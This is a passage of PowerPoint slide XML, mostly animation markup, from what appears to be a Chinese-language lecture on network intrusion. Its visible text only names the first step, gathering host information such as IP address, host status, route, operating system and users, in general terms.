                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54"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dissolve">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8"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500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="65" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="66" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="67"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dissolve">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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8"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p:cTn id="77" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="78" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>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slide(fromBottom)">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>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7" presetClass="entr" presetSubtype="8"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p:cTn id="90" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="92" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="93"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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>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7" presetClass="entr" presetSubtype="8" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="104" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="105" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="106"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3" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="110" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="111" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="112"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4" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="116" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="117" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="118" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+#ppt_h/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="119" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="120"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3" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="124" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="125" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="12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8" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="130" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="131" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="132" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="133" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="23"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="134"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3" presetClass="entr" presetSubtype="16" fill="hold" grpId="0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="138" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="139" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="140"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P spid="8" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="9" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="10" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="11" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="12" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="13" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="14" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="17" grpId="0" animBg="1"/>
      <p:bldP spid="1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7398D689-9134-474E-9D29-FA82A5BA6CF0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一步：获取信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263791D0-6897-42F7-8AA0-973F8D87AF8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2817813"/>
            <a:ext cx="8001000" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-22860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fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>地址、主机是否运行、要入侵点的路由、主机操作系统与用户信息等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E30FA11D-6C06-4353-93DE-042559EAC1D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2055813"/>
            <a:ext cx="3581400" cy="519112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>收集主机信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{289CC59D-279B-4959-B180-1C5570436B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="752475" y="4494213"/>
            <a:ext cx="8001000" cy="2363787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3333CC"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="2400" b="1">
